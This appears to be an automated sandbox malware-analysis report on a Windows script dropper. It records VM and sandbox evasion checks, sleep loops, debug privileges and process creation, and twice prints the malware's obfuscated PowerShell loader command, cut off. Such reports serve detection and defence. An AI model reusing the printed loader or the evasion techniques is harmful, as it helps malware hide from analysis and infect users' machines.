Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000003.00000002.724108628.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE*
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Function Chain: memAlloc,threadCreated,memAlloc,memAlloc,threadResumed,threadDelayed,processSet,memAlloc,processSet,memAlloc,memAlloc,memAlloc,threadDelayed,processSet,memAlloc,memAlloc,threadDelayed,memAlloc,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadDelayed
Potential evasive VBS script found (use of timer() function in loop)
Source: Initial file Initial file: do while timer-temp<sec
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1388 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 Thread sleep count: 235 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 Thread sleep time: -7050000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8736 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000003.00000002.739431756.0000000004B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.748157526.0000000004E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000003.00000002.724108628.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe*
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 0000000A.00000002.823804324.00000000017E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 0000000A.00000002.823176402.000000000178B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM~
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VScx
Source: powershell.exe, 00000003.00000002.739431756.0000000004B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.748157526.0000000004E59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 0000000A.00000002.823804324.00000000017E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW"
Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E9980 LdrInitializeThunk, 10_2_209E9980
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skolegaardene = """reabedsaddi-fitgeysjpsyean de-chtheytepaneladreeopfprinonmiiprtsainooscnka da'kourisfoiudnmygsy sysimyinsofttretumok;suustsnyisunbigdr trsmiyassdatdeeprmti.dormiumansotcoigamduebi.boiannsotpheoprinoudptesdeeomrgovstiknctredesfo;oppsiupabfolvaiafcgl elsshtfiabathvicocot dacunlryadzsspsor sirchepraudbstrgiisidadgpaenodat1ch in{cr[fjddrladlsqihemtapkoobervatde(ne`"""sowowihansamblmba.dedsalbalin`"""bi)sg]koppeuasbfolunihocmy prsgrtunasetinistcsi haenexsktbreporfenge uniunnartma homcaimbdsaisuotjulgtnoozipfoejrnxs(smiornbutbr pokprvabatalmoibe,tiigansatth brkatovinte,zailunditad korruiovnpegsaeatdth,rribantrtde spuounpywfoohe,hoiknngetha kouwidgrere)co;as[mudtulallreithmnopblobrrfitne(ud`"""sekuneserobnomebilhl3up2te`"""he)av]riparufuboclfiicucma assemtsaadrtapifrctu raestxditkievermenpr jiifanovtlo arlmoopecviaaulprsunhcarpoihunsvkde(ouiunnhitst resdycpuounrtupgribr,whivendotst stnsasfikovematimnup)eu;fg[gudhylanlfuipemafpleowirmutra(kh`"""vekbieemradnpueanlnl3ek2bl`"""sp)pe]repgeurebprlreiracst desbettaamatfiifocom shefaxpitdieunrtanko blisunkatke scsarecatancudomombomsisditcaazatamere(unismnextse cokcuobefaltsmaaf,naiafnlatsu scslatkaohorhortrybu)sk;kr[lidstlimlcuihomekptaorkrbrtsh(pu`"""pskfeeskrannopeunlbi3sp2ut`"""va)gr]goporupabovlupishcsu vesbetlaaistptisncen puebuxagtcoeunrcanue alimonvetce trhleesaaslpjacdyrsiediaafttiedr(iligrnudten scndoedocwirhiosapbe,biivonsitdo gafselafsfnkpr,iniinnantos mogsirspufiple)al;sy[brduplablseipomsupteobarbltgl(af`"""prkcoexerbanfleaflsy3br2ma`"""un)tr]hepnaunobcolulirecud srsdettharotkuiiscph grebexfrtgeesprminvi ciifinwotde stvfaipsrzotthumiaoplstaarlunlagogrcbo(daisansytaf eqvep1sy,hoidenoxtst unvme2be,trikonkotro skvfl3wi,foimongatfi stvmi4ch)be;tu[padatlbglopikomphplaobarsptwa(ma`"""thijamremde3ba2vi.hedsolsalba`"""fe)br]sepluuenbafldeihocsk lushytviaantkoipoczr noedrxurtclefardonbl heibanbrtxe hviblmrhmagskredetevsmatfiaratuduansduwanirunkeddioopwtrpbroanspu(coiunnditba neppoasklskaen,chirenxetal skrpyainzne)me;bi[vadrelrhlanisemifpouochrfrtde(ti`"""omahydwivreafapgriph3sn2mi.spdnilpllvu`"""ep)un]vepclussbgelreiafcfl drslgtmiaertpaiopcna shesixcytopegerbensu unistntitak baisnntrisotmaiscagrlpaiejzcoeanakactalbe(poipunhntru tectioaclba,aaisynmetmi leupindeapr,afimenretas fafmelfroteporpol2na0ma1sn)mi;in[dedsalpalslichmnoperophreutsc(pa`"""engsvdtaiol3re2so`"""ud)qu]fiphyuskbadlmaigucgi ocsudtlaamotreifrcsk ijewixaxtqueunrhanbo geicinmatsa husseeratbewedilinbldenomewfuepexnotbrestxpl(slisannvtge biddaudacfl,buityncetto udhtoelanhubhuldy,anibenoutti moskuibrdraecotcaafo,isitinthtub afaulpfrpisatosis)pa;uf[audtilcalafiscmbapomoikrhetom(un`"""mygprdalipa3an2tr`"""un)th]ropjoucebmalfliblcbl agslrtpyabethjicocul taevoxfotafenoralnby coiaunittha nautrnnorigegeakelnoivazanestosjbenjsieopcfrtun(leihjnuntki rvhnoobiwbeeframanhe)su;sp[caddiludlplibemfrpnooegrditde(ce`"""coudesag
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skolegaardene = """reabedsaddi-fitgeysjpsyean de-chtheytepaneladreeopfprinonmiiprtsainooscnka da'kourisfoiudnmygsy sysimyinsofttretumok;suustsnyisunbigdr trsmiyassdatdeeprmti.dormiumansotcoigamduebi.boiannsotpheoprinoudptesdeeomrgovstiknctredesfo;oppsiupabfolvaiafcgl elsshtfiabathvicocot dacunlryadzsspsor sirchepraudbstrgiisidadgpaenodat1ch in{cr[fjddrladlsqihemtapkoobervatde(ne`"""sowowihansamblmba.dedsalbalin`"""bi)sg]koppeuasbfolunihocmy prsgrtunasetinistcsi haenexsktbreporfenge uniunnartma homcaimbdsaisuotjulgtnoozipfoejrnxs(smiornbutbr pokprvabatalmoibe,tiigansatth brkatovinte,zailunditad korruiovnpegsaeatdth,rribantrtde spuounpywfoohe,hoiknngetha kouwidgrere)co;as[mudtulallreithmnopblobrrfitne(ud`"""sekuneserobnomebilhl3up2te`"""he)av]riparufuboclfiicucma assemtsaadrtapifrctu raestxditkievermenpr jiifanovtlo arlmoopecviaaulprsunhcarpoihunsvkde(ouiunnhitst resdycpuounrtupgribr,whivendotst stnsasfikovematimnup)eu;fg[gudhylanlfuipemafpleowirmutra(kh`"""vekbieemradnpueanlnl3ek2bl`"""sp)pe]repgeurebprlreiracst desbettaamatfiifocom shefaxpitdieunrtanko blisunkatke scsarecatancudomombomsisditcaazatamere(unismnextse cokcuobefaltsmaaf,naiafnlatsu scslatkaohorhortrybu)sk;kr[lidstlimlcuihomekptaorkrbrtsh(pu`"""pskfeeskrannopeunlbi3sp2ut`"""va)gr]goporupabovlupishcsu vesbetlaaistptisncen puebuxagtcoeunrcanue alimonvetce trhleesaaslpjacdyrsiediaafttiedr(iligrnudten scndoedocwirhiosapbe,biivonsitdo gafselafsfnkpr,iniinnantos mogsirspufiple)al;sy[brduplablseipomsupteobarbltgl(af`"""prkcoexerbanfleaflsy3br2ma`"""un)tr]hepnaunobcolulirecud srsdettharotkuiiscph grebexfrtgeesprminvi ciifinwotde stvfaipsrzotthumiaoplstaarlunlagogrcbo(daisansytaf eqvep1sy,hoidenoxtst unvme2be,trikonkotro skvfl3wi,foimongatfi stvmi4ch)be;tu[padatlbglopikomphplaobarsptwa(ma`"""thijamremde3ba2vi.hedsolsalba`"""fe)br]sepluuenbafldeihocsk lushytviaantkoipoczr noedrxurtclefardonbl heibanbrtxe hviblmrhmagskredetevsmatfiaratuduansduwanirunkeddioopwtrpbroanspu(coiunnditba neppoasklskaen,chirenxetal skrpyainzne)me;bi[vadrelrhlanisemifpouochrfrtde(ti`"""omahydwivreafapgriph3sn2mi.spdnilpllvu`"""ep)un]vepclussbgelreiafcfl drslgtmiaertpaiopcna shesixcytopegerbensu unistntitak baisnntrisotmaiscagrlpaiejzcoeanakactalbe(poipunhntru tectioaclba,aaisynmetmi leupindeapr,afimenretas fafmelfroteporpol2na0ma1sn)mi;in[dedsalpalslichmnoperophreutsc(pa`"""engsvdtaiol3re2so`"""ud)qu]fiphyuskbadlmaigucgi ocsudtlaamotreifrcsk ijewixaxtqueunrhanbo geicinmatsa husseeratbewedilinbldenomewfuepexnotbrestxpl(slisannvtge biddaudacfl,buityncetto udhtoelanhubhuldy,anibenoutti moskuibrdraecotcaafo,isitinthtub afaulpfrpisatosis)pa;uf[audtilcalafiscmbapomoikrhetom(un`"""mygprdalipa3an2tr`"""un)th]ropjoucebmalfliblcbl agslrtpyabethjicocul taevoxfotafenoralnby coiaunittha nautrnnorigegeakelnoivazanestosjbenjsieopcfrtun(leihjnuntki rvhnoobiwbeeframanhe)su;sp[caddiludlplibemfrpnooegrditde(ce`"""coudesag Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
